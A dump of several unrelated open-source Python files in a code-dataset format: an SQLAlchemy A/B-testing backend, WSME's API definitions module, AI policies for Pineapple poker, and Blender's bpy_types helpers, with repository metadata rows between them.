        Returns a ``String`` or ``None``
"""
try:
match = model.Participant.query.join(
model.Experiment
).filter(and_(
model.Participant.identity == identity,
model.Experiment.name == experiment_name
)).first()
return match.variant.name if match else None
finally:
self.Session.close()
def set_variant(self, identity, experiment_name, variant_name):
"""
Set the variant for a specific user.
        :param identity: a unique user identifier
        :param experiment_name: the string name of the experiment
        :param variant_name: the string name of the variant
"""
try:
experiment = model.Experiment.get_by(name=experiment_name)
variant = model.Variant.get_by(name=variant_name)
if experiment and variant and model.Participant.query.filter(and_(
model.Participant.identity == identity,
model.Participant.experiment_id == experiment.id,
model.Participant.variant_id == variant.id
)).count() == 0:
model.Participant(
identity=identity,
experiment=experiment,
variant=variant
)
self.Session.commit()
finally:
self.Session.close()
def _mark_event(self, type, experiment_name, variant_name):
try:
experiment = model.Experiment.get_by(name=experiment_name)
variant = model.Variant.get_by(name=variant_name)
if experiment and variant and model.TrackedEvent.query.filter(and_(
model.TrackedEvent.type == type,
model.TrackedEvent.experiment_id == experiment.id,
model.TrackedEvent.variant_id == variant.id
)).first() is None:
model.TrackedEvent(
type=type,
experiment=experiment,
variant=variant
)
self.Session.commit()
finally:
self.Session.close()
try:
experiment = model.Experiment.get_by(name=experiment_name)
variant = model.Variant.get_by(name=variant_name)
if experiment and variant:
self.Session.execute(
'UPDATE %s SET total = total + 1 '
'WHERE experiment_id = :experiment_id '
'AND variant_id = :variant_id '
'AND `type` = :type' % (
model.TrackedEvent.__tablename__
),
{
'experiment_id': experiment.id,
'variant_id': variant.id,
'type': type
}
)
self.Session.commit()
finally:
self.Session.close()
def mark_participant(self, experiment_name, variant):
"""
Mark a participation for a specific experiment variant.
        :param experiment_name: the string name of the experiment
        :param variant: the string name of the variant
"""
self._mark_event('PARTICIPANT', experiment_name, variant)
def mark_conversion(self, experiment_name, variant):
"""
Mark a conversion for a specific experiment variant.
        :param experiment_name: the string name of the experiment
        :param variant: the string name of the variant
"""
self._mark_event('CONVERSION', experiment_name, variant)
def _total_events(self, type, experiment_name, variant):
try:
row = model.TrackedEvent.query.join(
model.Experiment
).join(
model.Variant
).filter(and_(
model.TrackedEvent.type == type,
model.TrackedEvent.experiment_id == model.Experiment.id,
model.TrackedEvent.variant_id == model.Variant.id,
model.Experiment.name == experiment_name,
model.Variant.name == variant
)).first()
return row.total if row else 0
finally:
self.Session.close()
def participants(self, experiment_name, variant):
"""
The number of participants for a certain variant.
Returns an integer.
"""
return self._total_events('PARTICIPANT', experiment_name, variant)
def conversions(self, experiment_name, variant):
"""
The number of conversions for a certain variant.
Returns an integer.
"""
return self._total_events('CONVERSION', experiment_name, variant)
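# Rough usage sketch (assumes a reachable database URI and hypothetical
# experiment/variant names; not part of the original module):
#
#   backend = SQLAlchemyBackend(dburi='sqlite:///cleaver.db')
#   backend.save_experiment('button-color', ('control', 'red', 'blue'))
#   backend.set_variant('user-42', 'button-color', 'red')
#   backend.mark_participant('button-color', 'red')
#   backend.mark_conversion('button-color', 'red')
#   print(backend.participants('button-color', 'red'))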
| bsd-3-clause | 4,451,674,343,953,962,000 | 32.975309 | 79 | 0.562379 | false |
stackforge/wsme | wsme/api.py | 1 | 7477 | import traceback
import functools
import inspect
import logging
import six
import wsme.exc
import wsme.types
from wsme import utils
log = logging.getLogger(__name__)
def iswsmefunction(f):
return hasattr(f, '_wsme_definition')
def wrapfunc(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
return f(*args, **kwargs)
wrapper._wsme_original_func = f
return wrapper
def getargspec(f):
f = getattr(f, '_wsme_original_func', f)
return inspect.getargspec(f)
class FunctionArgument(object):
"""
An argument definition of an api entry
"""
def __init__(self, name, datatype, mandatory, default):
#: argument name
self.name = name
#: Data type
self.datatype = datatype
#: True if the argument is mandatory
self.mandatory = mandatory
#: Default value if argument is omitted
self.default = default
def resolve_type(self, registry):
self.datatype = registry.resolve_type(self.datatype)
class FunctionDefinition(object):
"""
An api entry definition
"""
def __init__(self, func):
#: Function name
self.name = func.__name__
#: Function documentation
self.doc = func.__doc__
#: Return type
self.return_type = None
#: The function arguments (list of :class:`FunctionArgument`)
self.arguments = []
        #: If the body carries the data of a single argument, its type
self.body_type = None
#: Status code
self.status_code = 200
        #: True if extra arguments should be ignored: they will NOT be
        #: inserted in the kwargs of the function and will not raise
        #: UnknownArgument exceptions
self.ignore_extra_args = False
#: name of the function argument to pass the host request object.
#: Should be set by using the :class:`wsme.types.HostRequest` type
#: in the function @\ :function:`signature`
self.pass_request = False
        #: Dictionary of protocol-specific options.
self.extra_options = None
@staticmethod
def get(func):
"""
Returns the :class:`FunctionDefinition` of a method.
"""
if not hasattr(func, '_wsme_definition'):
fd = FunctionDefinition(func)
func._wsme_definition = fd
return func._wsme_definition
def get_arg(self, name):
"""
Returns a :class:`FunctionArgument` from its name
"""
for arg in self.arguments:
if arg.name == name:
return arg
return None
def resolve_types(self, registry):
self.return_type = registry.resolve_type(self.return_type)
self.body_type = registry.resolve_type(self.body_type)
for arg in self.arguments:
arg.resolve_type(registry)
def set_options(self, body=None, ignore_extra_args=False, status_code=200,
rest_content_types=('json', 'xml'), **extra_options):
self.body_type = body
self.status_code = status_code
self.ignore_extra_args = ignore_extra_args
self.rest_content_types = rest_content_types
self.extra_options = extra_options
def set_arg_types(self, argspec, arg_types):
args, varargs, keywords, defaults = argspec
if args[0] == 'self':
args = args[1:]
arg_types = list(arg_types)
if self.body_type is not None:
arg_types.append(self.body_type)
for i, argname in enumerate(args):
datatype = arg_types[i]
mandatory = defaults is None or i < (len(args) - len(defaults))
default = None
if not mandatory:
default = defaults[i - (len(args) - len(defaults))]
if datatype is wsme.types.HostRequest:
self.pass_request = argname
else:
self.arguments.append(FunctionArgument(argname, datatype,
mandatory, default))
class signature(object):
"""Decorator that specify the argument types of an exposed function.
:param return_type: Type of the value returned by the function
:param argN: Type of the Nth argument
:param body: If the function takes a final argument that is supposed to be
the request body by itself, its type.
:param status_code: HTTP return status code of the function.
    :param ignore_extra_args: Allow extra/unknown arguments (defaults to False)
    Most of the time this decorator is not supposed to be used directly;
    it is only needed when WSME is not used on top of another framework.
    If an adapter is used, it will provide either a specialised version of this
    decorator, or a new decorator named @wsexpose that takes the same
    parameters (it will in addition expose the function, hence its name).
"""
def __init__(self, *types, **options):
self.return_type = types[0] if types else None
self.arg_types = []
if len(types) > 1:
self.arg_types.extend(types[1:])
if 'body' in options:
self.arg_types.append(options['body'])
self.wrap = options.pop('wrap', False)
self.options = options
def __call__(self, func):
argspec = getargspec(func)
if self.wrap:
func = wrapfunc(func)
fd = FunctionDefinition.get(func)
if fd.extra_options is not None:
raise ValueError("This function is already exposed")
fd.return_type = self.return_type
fd.set_options(**self.options)
if self.arg_types:
fd.set_arg_types(argspec, self.arg_types)
return func
sig = signature
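# Hedged illustration of the decorator (hypothetical function and types, not
# taken from the WSME documentation):
#
#   @signature(int, int, int)
#   def multiply(a, b):
#       return a * b
#
# i.e. 'multiply' is declared to return an int and to take two int arguments.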
class Response(object):
"""
Object to hold the "response" from a view function
"""
def __init__(self, obj, status_code=None, error=None,
return_type=wsme.types.Unset):
#: Store the result object from the view
self.obj = obj
#: Store an optional status_code
self.status_code = status_code
#: Return error details
        #: Must be a dictionary with the following keys: faultcode,
#: faultstring and an optional debuginfo
self.error = error
#: Return type
#: Type of the value returned by the function
#: If the return type is wsme.types.Unset it will be ignored
#: and the default return type will prevail.
self.return_type = return_type
def format_exception(excinfo, debug=False):
"""Extract informations that can be sent to the client."""
error = excinfo[1]
code = getattr(error, 'code', None)
if code and utils.is_valid_code(code) and utils.is_client_error(code):
faultstring = (error.faultstring if hasattr(error, 'faultstring')
else six.text_type(error))
r = dict(faultcode="Client",
faultstring=faultstring)
log.debug("Client-side error: %s" % r['faultstring'])
r['debuginfo'] = None
return r
else:
faultstring = six.text_type(error)
debuginfo = "\n".join(traceback.format_exception(*excinfo))
log.error('Server-side error: "%s". Detail: \n%s' % (
faultstring, debuginfo))
r = dict(faultcode="Server", faultstring=faultstring)
if debug:
r['debuginfo'] = debuginfo
else:
r['debuginfo'] = None
return r
| mit | 1,039,123,132,913,184,800 | 30.548523 | 79 | 0.604521 | false |
session-id/pineapple-ai | policies.py | 1 | 15317 | from collections import defaultdict
import math
import numpy as np
import random
import feature_extractors
import game as g
import hand_optimizer
class BasePolicy(object):
'''
Base class for all policies.
'''
def __init__(self, game, args=None):
self.game = game
# Must return the optimal action as determined by the policy for the given state
def get_action(self, state):
raise NotImplementedError
class HumanPolicy(BasePolicy):
'''
A policy that asks for human input for every move.
'''
def get_action(self, state):
while True:
self.game.print_state(state)
try:
# Action input format is Pos1 Pos2 ... PosN
# Example: 0 0 1 2 0
inp = raw_input("Card placements (space separated, x for discard): ").upper()
inp = inp.split(' ')
draw = sorted(state.draw)
action = tuple(sorted((draw[i], int(inp[i])) for i in range(len(inp)) if inp[i] != 'X'))
new_state = self.game.get_random_outcome(state, action) # Check if valid
return action
except Exception as e:
print 'Invalid action: {}'.format(e)
class RandomPolicy(BasePolicy):
'''
Policy that chooses an action uniformly randomly from all possible actions.
'''
def get_action(self, state):
actions = self.game.actions(state)
return random.sample(actions, 1)[0]
class BaselinePolicy(BasePolicy):
'''
Baseline policy as described in project proposal.
Starts off by placing cards at or below top_cutoff on top row, those
at or below mid_cutoff in mid row, and the rest in the bottom row.
Then, for every 3 card draw, takes the 2 largest cards and slots them according
to the same rule when possible, otherwise slotting them as low as possible.
'''
def __init__(self, game, args):
super(BaselinePolicy, self).__init__(game, args)
self.top_cutoff = 4
self.mid_cutoff = 9
def value_to_slot(self, value):
if value <= self.top_cutoff:
return 0
elif value <= self.mid_cutoff:
return 1
else:
return 2
def get_action(self, state):
remaining_capacities = self.game.get_remaining_capacities(state)
# Sort in decreasing order
draw = sorted(state.draw, lambda x, y: g.card_value(y) - g.card_value(x))
assert len(draw) == 5 or len(draw) == 3
# Always take highest 2 cards
if len(draw) == 3:
draw = draw[:-1]
values = [g.card_value(card) for card in draw]
action = []
for i in range(len(values)):
desired_row = self.value_to_slot(values[i])
slotted = False
# Search downwards first for spots
for j in range(desired_row, 3):
if remaining_capacities[j] > 0:
action += [(draw[i], j)]
remaining_capacities[j] -= 1
slotted = True
break
if not slotted:
# Then search upwards
for j in range(desired_row-1, -1, -1):
if remaining_capacities[j] > 0:
action += [(draw[i], j)]
remaining_capacities[j] -= 1
slotted = True
break
if not slotted:
self.game.print_state(state)
raise RuntimeError("Couldn't slot card anywhere!")
return tuple(action)
class NeverBustPolicy(BasePolicy):
'''
A policy that never plays a move that makes the current hierarchy of cards a bust. The policy
randomly samples from all viable moves.
'''
def get_action(self, state):
actions = self.game.actions(state)
def eval_action(action):
outcome = self.game.sim_place_cards(state, action)
hands = [g.compute_hand(row) for row in outcome.rows]
return g.compare_hands(hands[1], hands[0]) >= 0 and g.compare_hands(hands[2], hands[1]) >= 0
evals = [(eval_action(action), action) for action in actions]
viable = [y for x, y in evals if x == max(evals)[0]]
return random.sample(viable, 1)[0]
class HeuristicNeverBustPolicy(BasePolicy):
'''
A policy that never plays a move that makes the current hierarchy of cards a bust. Within viable
moves, it attempts to greedily form hands to maximize the total sum of hand values as denoted by
a heuristic table.
Afterwards, it tries to maximize the flexibility of the playable hand, which is the sum of the
number of remaining slots per row raised to a preset power.
'''
def get_action(self, state):
actions = self.game.actions(state)
# Heuristic hand values
self.hand_values = {
'1': 0,
'2': 1,
'2+2': 2,
'3': 4,
'St': 8,
'Fl': 8,
'3+2': 12,
'4': 20,
'StFl': 30,
'RoFl': 50
}
def eval_action(action):
outcome = self.game.sim_place_cards(state, action)
hands = [g.compute_hand(row) for row in outcome.rows]
total_value = sum(self.hand_values[hand[0]] for hand in hands)
flexibility = sum([x ** 0.3 for x in self.game.get_remaining_capacities(outcome)])
return (g.compare_hands(hands[1], hands[0]) >= 0 and g.compare_hands(hands[2], hands[1]) >= 0,
total_value, flexibility)
evals = [(eval_action(action), action) for action in actions]
viable = [y for x, y in evals if x == max(evals)[0]]
return random.sample(viable, 1)[0]
class RLPolicy(BasePolicy):
'''
Base class for all RL policies with incorporate_feedback.
'''
def incorporate_feedback(self, state, action, new_state):
raise NotImplementedError
class QLearningPolicy(RLPolicy):
'''
A class that uses linear approximations of Q values built off of features to guide actions taken while
learning optimal linear weights through feedback incorporation.
'''
def __init__(self, game, args):
'''
Input:
game: Pineapple game instance
      feature_extractor: a function that extracts features from a given row. See feature_extractors.py for the interface.
exploration_prob: initial probability of exploration
'''
# Initialize step size, weight vector, etc
# Add field to indicate whether training - this determines whether epsilon greedy policy is used
super(QLearningPolicy, self).__init__(game, args)
self.feature_extractor = feature_extractors.name_to_extractor(args.feature_extractor)
self.distinguish_draws = args.distinguish_draws
self.exploration_prob = args.exploration_prob
self.train = True
self.step_size = args.step_size
self.weights = defaultdict(float)
feature_extractors.parse_probability_files()
def get_step_size(self):
return self.step_size
def get_features(self, state, action):
state = self.game.sim_place_cards(state, action)
num_to_draw = self.game.num_to_draw(state)
features = {}
for row_num, cards in enumerate(state.rows):
for k, v in self.feature_extractor(row_num, cards, state.remaining, num_to_draw).iteritems():
if self.distinguish_draws:
features[(num_to_draw, row_num, k)] = v
else:
features[(row_num, k)] = v
return features
def get_q(self, state, action):
# Find exact solution if about to finish
final_state = self.game.sim_place_cards(state, action)
if self.game.is_end(final_state):
return self.game.utility(final_state)
# Otherwise use linear approximation
features = self.get_features(state, action)
return sum(self.weights[key] * features[key] for key in features)
def get_action(self, state):
actions = self.game.actions(state)
if self.train and random.random() < self.exploration_prob:
return random.choice(actions)
return max((self.get_q(state, action), action) for action in actions)[1]
def incorporate_feedback(self, state, action, new_state):
if not self.train:
return
if self.game.is_end(new_state):
return
else:
prediction = self.get_q(state, action)
V_opt = max(self.get_q(new_state, a) for a in self.game.actions(new_state))
features = self.get_features(state, action)
deviation = prediction - V_opt
total_update = 0
for (name, value) in features.iteritems():
self.weights[name] -= self.get_step_size() * deviation * value
total_update += abs(self.get_step_size() * deviation * value)
# print "Total update:", total_update, "Deviation:", deviation, "len(features):", len(features) #,
class QLearningPolicy2(QLearningPolicy):
'''
A version of QLearningPolicy above that uses feature extractors that work on generic state, action
pairs.
'''
def __init__(self, game, args):
super(QLearningPolicy2, self).__init__(game, args)
self.feature_extractor = self.feature_extractor(self.game)
self.weights = self.feature_extractor.default_weights()
def get_features(self, state, action):
return self.feature_extractor.extract(state, action)
class OracleEvalPolicy(BasePolicy):
'''
A policy that uses the oracle best case royalties averaged over several draws to optimize the
current action.
'''
def __init__(self, game, args):
super(OracleEvalPolicy, self).__init__(game, args)
self.num_sims = args.num_oracle_sims
self.alpha = args.oracle_outcome_weighting
def get_action(self, state):
actions = self.game.actions(state)
def eval_action(action):
outcome = self.game.sim_place_cards(state, action)
values = []
if self.game.num_to_draw(outcome) == 0:
return self.game.utility(outcome)
num_to_draw_map = {12: 8, 9: 6, 6: 5, 3: 3}
# num_to_draw = int(math.ceil(self.game.num_to_draw(outcome) * 0.7))
num_to_draw = num_to_draw_map[self.game.num_to_draw(outcome)]
num_sims = self.num_sims
for _ in xrange(self.num_sims):
draw = random.sample(outcome.remaining, num_to_draw)
values += [hand_optimizer.optimize_hand(outcome.rows, draw)]
values = np.array(values)
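      # sign-preserving power mean: alpha < 1 damps the effect of rare large
      # payoffs, alpha > 1 emphasises them (alpha == 1 is the plain mean)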
return (np.mean(np.sign(values) * np.abs(values) ** self.alpha)) ** (1. / self.alpha)
eval_actions = [(eval_action(action), action) for action in actions]
# print "Estimated value: {}".format(max(eval_actions)[0])
return max(eval_actions)[1]
class VarSimOracleEvalPolicy(BasePolicy):
'''
OracleEvalPolicy with a different exploration policy that explores the best actions in greater depth.
'''
def __init__(self, game, args):
super(VarSimOracleEvalPolicy, self).__init__(game, args)
self.num_sims = args.num_oracle_sims
def get_action(self, state):
actions = self.game.actions(state)
outcomes = [(self.game.sim_place_cards(state, action), action) for action in actions]
num_to_draw_map = {12: 8, 9: 6, 6: 5, 3: 3, 0: 0}
def interpolate_action(prev, outcome, num_sims, round_num):
values = []
num_to_draw = num_to_draw_map[self.game.num_to_draw(outcome)]
for _ in xrange(num_sims):
draw = random.sample(outcome.remaining, num_to_draw)
values += [hand_optimizer.optimize_hand(outcome.rows, draw)]
values = np.array(values)
return prev * (1 - 1. / round_num) + np.mean(values) / round_num
outcomes_with_histories = [(0., outcome, action) for outcome, action in outcomes]
round_num = 1.
while len(outcomes_with_histories) > 1:
outcomes_with_histories = [(interpolate_action(prev, outcome, self.num_sims, round_num), outcome, action)
for prev, outcome, action in outcomes_with_histories]
outcomes_with_histories.sort()
outcomes_with_histories = outcomes_with_histories[len(outcomes_with_histories) / 2:]
round_num += 1
return outcomes_with_histories[0][2]
class TDLearningPolicy(RLPolicy):
'''
A class that uses linear approximations of Value functions built off of features to guide actions taken while
learning optimal linear weights through feedback incorporation.
'''
def __init__(self, game, args):
'''
Input:
game: Pineapple game instance
      feature_extractor: a function that extracts features from a given row. See feature_extractors.py for the interface.
exploration_prob: initial probability of exploration
'''
# Initialize step size, weight vector, etc
# Add field to indicate whether training - this determines whether epsilon greedy policy is used
super(TDLearningPolicy, self).__init__(game, args)
self.feature_extractor = feature_extractors.name_to_extractor(args.feature_extractor)
self.exploration_prob = args.exploration_prob
self.train = True
self.step_size = args.step_size
self.weights = defaultdict(float)
feature_extractors.parse_probability_files()
def get_step_size(self):
return self.step_size
def get_features(self, state, action):
pass
def get_q(self, state, action):
pass
def get_action(self, state):
pass
def incorporate_feedback(self, state, action, new_state):
pass
'''
Adversarial capable policies below
'''
class AdvVarSimOracleEvalPolicy(BasePolicy):
'''
Adversarial version of VarSimOracleEvalPolicy
'''
def __init__(self, game, args):
super(AdvVarSimOracleEvalPolicy, self).__init__(game, args)
self.num_sims = args.num_oracle_sims
self.num_opp_sims = args.num_opp_sims
def get_action(self, state):
actions = self.game.actions(state)
outcomes = [(self.game.sim_place_cards(state, action), action) for action in actions]
num_to_draw = self.game.num_to_draw(outcomes[0][0])
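    # cards the opponent has already placed -> cards still to be dealt to them
    # (5 initial placements plus four 3-card draws, 17 cards in total)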
table = {0: 17, 5: 12, 7: 9, 9: 6, 11: 3, 13: 0}
opp_num_to_draw = table[sum(len(x) for x in state.opp_rows)]
opp_rows = state.opp_rows
# TODO: Better adversarial fantasyland bonus calculation
opp_num_to_draw_map = {12: 8, 9: 6, 6: 5, 3: 3, 0: 0}
if opp_num_to_draw <= 9:
opp_combos = []
if opp_num_to_draw > 0:
num_to_draw_sim = opp_num_to_draw_map[opp_num_to_draw]
for _ in xrange(self.num_opp_sims):
# state.remaining and outcome.remaining for any outcome should be equal
draw = random.sample(state.remaining, num_to_draw_sim)
# Assume opponent just plays to maximize their royalties
value, combo = hand_optimizer.optimize_hand(opp_rows, draw, return_combo=True)
opp_combos += [combo]
else:
opp_combos = [[g.compute_hand(cards) for cards in opp_rows]]
value_fn = lambda rows, draw: hand_optimizer.optimize_hand_adv(rows, draw, opp_combos)
else:
value_fn = lambda rows, draw: hand_optimizer.optimize_hand(rows, draw)
num_to_draw_map = {12: 8, 9: 6, 6: 5, 3: 3, 0: 0}
def interpolate_action(prev, outcome, num_sims, round_num):
values = []
num_to_draw_sim = num_to_draw_map[num_to_draw]
for _ in xrange(num_sims):
draw = random.sample(outcome.remaining, num_to_draw_sim)
values += [value_fn(outcome.rows, draw)]
values = np.array(values)
return prev * (1 - 1. / round_num) + np.mean(values) / round_num
outcomes_with_histories = [(0., outcome, action) for outcome, action in outcomes]
round_num = 1.
while len(outcomes_with_histories) > 1:
outcomes_with_histories = [(interpolate_action(prev, outcome, self.num_sims, round_num), outcome, action)
for prev, outcome, action in outcomes_with_histories]
outcomes_with_histories.sort()
outcomes_with_histories = outcomes_with_histories[len(outcomes_with_histories) / 2:]
round_num += 1
return outcomes_with_histories[0][2]
| mit | -9,055,318,519,636,846,000 | 35.731415 | 116 | 0.65757 | false |
Passtechsoft/TPEAlpGen | blender/release/scripts/modules/bpy_types.py | 1 | 24184 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8-80 compliant>
from _bpy import types as bpy_types
import _bpy
StructRNA = bpy_types.bpy_struct
StructMetaPropGroup = bpy_types.bpy_struct_meta_idprop
# StructRNA = bpy_types.Struct
bpy_types.BlendDataLibraries.load = _bpy._library_load
class Context(StructRNA):
__slots__ = ()
def copy(self):
from types import BuiltinMethodType
new_context = {}
generic_attrs = (
*StructRNA.__dict__.keys(),
"bl_rna", "rna_type", "copy",
)
for attr in dir(self):
if not (attr.startswith("_") or attr in generic_attrs):
value = getattr(self, attr)
if type(value) != BuiltinMethodType:
new_context[attr] = value
return new_context
class Library(bpy_types.ID):
__slots__ = ()
@property
def users_id(self):
"""ID data blocks which use this library"""
import bpy
# See: readblenentry.c, IDTYPE_FLAGS_ISLINKABLE,
# we could make this an attribute in rna.
attr_links = ("actions", "armatures", "brushes", "cameras",
"curves", "grease_pencil", "groups", "images",
"lamps", "lattices", "materials", "metaballs",
"meshes", "node_groups", "objects", "scenes",
"sounds", "speakers", "textures", "texts",
"fonts", "worlds")
return tuple(id_block
for attr in attr_links
for id_block in getattr(bpy.data, attr)
if id_block.library == self)
class Texture(bpy_types.ID):
__slots__ = ()
@property
def users_material(self):
"""Materials that use this texture"""
import bpy
return tuple(mat for mat in bpy.data.materials
if self in [slot.texture
for slot in mat.texture_slots
if slot]
)
@property
def users_object_modifier(self):
"""Object modifiers that use this texture"""
import bpy
return tuple(obj for obj in bpy.data.objects if
self in [mod.texture
for mod in obj.modifiers
if mod.type == 'DISPLACE']
)
class Group(bpy_types.ID):
__slots__ = ()
@property
def users_dupli_group(self):
"""The dupli group this group is used in"""
import bpy
return tuple(obj for obj in bpy.data.objects
if self == obj.dupli_group)
class Object(bpy_types.ID):
__slots__ = ()
@property
def children(self):
"""All the children of this object"""
import bpy
return tuple(child for child in bpy.data.objects
if child.parent == self)
@property
def users_group(self):
"""The groups this object is in"""
import bpy
return tuple(group for group in bpy.data.groups
if self in group.objects[:])
@property
def users_scene(self):
"""The scenes this object is in"""
import bpy
return tuple(scene for scene in bpy.data.scenes
if self in scene.objects[:])
class WindowManager(bpy_types.ID):
__slots__ = ()
def popup_menu(self, draw_func, title="", icon='NONE'):
import bpy
popup = self.pupmenu_begin__internal(title, icon)
try:
draw_func(popup, bpy.context)
finally:
self.pupmenu_end__internal(popup)
def popup_menu_pie(self, event, draw_func, title="", icon='NONE'):
import bpy
pie = self.piemenu_begin__internal(title, icon, event)
if pie:
try:
draw_func(pie, bpy.context)
finally:
self.piemenu_end__internal(pie)
class _GenericBone:
"""
functions for bones, common between Armature/Pose/Edit bones.
internal subclassing use only.
"""
__slots__ = ()
def translate(self, vec):
"""Utility function to add *vec* to the head and tail of this bone"""
self.head += vec
self.tail += vec
def parent_index(self, parent_test):
"""
The same as 'bone in other_bone.parent_recursive'
        but saves generating a list.
"""
# use the name so different types can be tested.
name = parent_test.name
parent = self.parent
i = 1
while parent:
if parent.name == name:
return i
parent = parent.parent
i += 1
return 0
@property
def x_axis(self):
""" Vector pointing down the x-axis of the bone.
"""
from mathutils import Vector
return self.matrix.to_3x3() * Vector((1.0, 0.0, 0.0))
@property
def y_axis(self):
""" Vector pointing down the y-axis of the bone.
"""
from mathutils import Vector
return self.matrix.to_3x3() * Vector((0.0, 1.0, 0.0))
@property
def z_axis(self):
""" Vector pointing down the z-axis of the bone.
"""
from mathutils import Vector
return self.matrix.to_3x3() * Vector((0.0, 0.0, 1.0))
@property
def basename(self):
"""The name of this bone before any '.' character"""
#return self.name.rsplit(".", 1)[0]
return self.name.split(".")[0]
@property
def parent_recursive(self):
"""A list of parents, starting with the immediate parent"""
parent_list = []
parent = self.parent
while parent:
if parent:
parent_list.append(parent)
parent = parent.parent
return parent_list
@property
def center(self):
"""The midpoint between the head and the tail."""
return (self.head + self.tail) * 0.5
@property
def length(self):
"""
The distance from head to tail,
        when set the tail is moved to fit the length.
"""
return self.vector.length
@length.setter
def length(self, value):
self.tail = self.head + ((self.tail - self.head).normalized() * value)
@property
def vector(self):
"""
The direction this bone is pointing.
Utility function for (tail - head)
"""
return (self.tail - self.head)
@property
def children(self):
"""A list of all the bones children."""
return [child for child in self._other_bones if child.parent == self]
@property
def children_recursive(self):
"""A list of all children from this bone."""
bones_children = []
for bone in self._other_bones:
index = bone.parent_index(self)
if index:
bones_children.append((index, bone))
# sort by distance to parent
bones_children.sort(key=lambda bone_pair: bone_pair[0])
return [bone for index, bone in bones_children]
@property
def children_recursive_basename(self):
"""
Returns a chain of children with the same base name as this bone.
Only direct chains are supported, forks caused by multiple children
with matching base names will terminate the function
and not be returned.
"""
basename = self.basename
chain = []
child = self
while True:
children = child.children
children_basename = []
for child in children:
if basename == child.basename:
children_basename.append(child)
if len(children_basename) == 1:
child = children_basename[0]
chain.append(child)
else:
if children_basename:
print("multiple basenames found, "
"this is probably not what you want!",
self.name, children_basename)
break
return chain
@property
def _other_bones(self):
id_data = self.id_data
id_data_type = type(id_data)
if id_data_type == bpy_types.Object:
bones = id_data.pose.bones
elif id_data_type == bpy_types.Armature:
bones = id_data.edit_bones
if not bones: # not in edit mode
bones = id_data.bones
return bones
class PoseBone(StructRNA, _GenericBone, metaclass=StructMetaPropGroup):
__slots__ = ()
@property
def children(self):
obj = self.id_data
pbones = obj.pose.bones
self_bone = self.bone
return tuple(pbones[bone.name] for bone in obj.data.bones
if bone.parent == self_bone)
class Bone(StructRNA, _GenericBone, metaclass=StructMetaPropGroup):
__slots__ = ()
class EditBone(StructRNA, _GenericBone, metaclass=StructMetaPropGroup):
__slots__ = ()
def align_orientation(self, other):
"""
        Align this bone to another by moving its tail and setting its roll;
        the length of the other bone is not used.
"""
vec = other.vector.normalized() * self.length
self.tail = self.head + vec
self.roll = other.roll
def transform(self, matrix, scale=True, roll=True):
"""
        Transform the bone's head, tail, roll and envelope
(when the matrix has a scale component).
:arg matrix: 3x3 or 4x4 transformation matrix.
:type matrix: :class:`mathutils.Matrix`
:arg scale: Scale the bone envelope by the matrix.
:type scale: bool
:arg roll:
Correct the roll to point in the same relative
direction to the head and tail.
:type roll: bool
"""
from mathutils import Vector
z_vec = self.matrix.to_3x3() * Vector((0.0, 0.0, 1.0))
self.tail = matrix * self.tail
self.head = matrix * self.head
if scale:
scalar = matrix.median_scale
self.head_radius *= scalar
self.tail_radius *= scalar
if roll:
self.align_roll(matrix * z_vec)
def ord_ind(i1, i2):
if i1 < i2:
return i1, i2
return i2, i1
class Mesh(bpy_types.ID):
__slots__ = ()
def from_pydata(self, vertices, edges, faces):
"""
Make a mesh from a list of vertices/edges/faces
Until we have a nicer way to make geometry, use this.
:arg vertices:
float triplets each representing (X, Y, Z)
eg: [(0.0, 1.0, 0.5), ...].
:type vertices: iterable object
:arg edges:
int pairs, each pair contains two indices to the
*vertices* argument. eg: [(1, 2), ...]
:type edges: iterable object
:arg faces:
            iterator of faces, each face contains three or more indices to
the *vertices* argument. eg: [(5, 6, 8, 9), (1, 2, 3), ...]
:type faces: iterable object
"""
self.vertices.add(len(vertices))
self.edges.add(len(edges))
self.loops.add(sum((len(f) for f in faces)))
self.polygons.add(len(faces))
vertices_flat = [f for v in vertices for f in v]
self.vertices.foreach_set("co", vertices_flat)
del vertices_flat
edges_flat = [i for e in edges for i in e]
self.edges.foreach_set("vertices", edges_flat)
del edges_flat
# this is different in bmesh
loop_index = 0
for i, p in enumerate(self.polygons):
f = faces[i]
loop_len = len(f)
p.loop_start = loop_index
p.loop_total = loop_len
p.vertices = f
loop_index += loop_len
# if no edges - calculate them
if faces and (not edges):
self.update(calc_edges=True)
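        # hedged usage sketch (hypothetical data, not from the API docs):
        #   mesh = bpy.data.meshes.new("demo")
        #   mesh.from_pydata([(0, 0, 0), (1, 0, 0), (1, 1, 0)], [], [(0, 1, 2)])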
@property
def edge_keys(self):
return [ed.key for ed in self.edges]
class MeshEdge(StructRNA):
__slots__ = ()
@property
def key(self):
return ord_ind(*tuple(self.vertices))
class MeshTessFace(StructRNA):
__slots__ = ()
@property
def center(self):
"""The midpoint of the face."""
face_verts = self.vertices[:]
mesh_verts = self.id_data.vertices
if len(face_verts) == 3:
return (mesh_verts[face_verts[0]].co +
mesh_verts[face_verts[1]].co +
mesh_verts[face_verts[2]].co
) / 3.0
else:
return (mesh_verts[face_verts[0]].co +
mesh_verts[face_verts[1]].co +
mesh_verts[face_verts[2]].co +
mesh_verts[face_verts[3]].co
) / 4.0
@property
def edge_keys(self):
verts = self.vertices[:]
if len(verts) == 3:
return (ord_ind(verts[0], verts[1]),
ord_ind(verts[1], verts[2]),
ord_ind(verts[2], verts[0]),
)
else:
return (ord_ind(verts[0], verts[1]),
ord_ind(verts[1], verts[2]),
ord_ind(verts[2], verts[3]),
ord_ind(verts[3], verts[0]),
)
class MeshPolygon(StructRNA):
__slots__ = ()
@property
def edge_keys(self):
verts = self.vertices[:]
vlen = len(self.vertices)
return [ord_ind(verts[i], verts[(i + 1) % vlen]) for i in range(vlen)]
@property
def loop_indices(self):
start = self.loop_start
end = start + self.loop_total
return range(start, end)
class Text(bpy_types.ID):
__slots__ = ()
def as_string(self):
"""Return the text as a string."""
return "\n".join(line.body for line in self.lines)
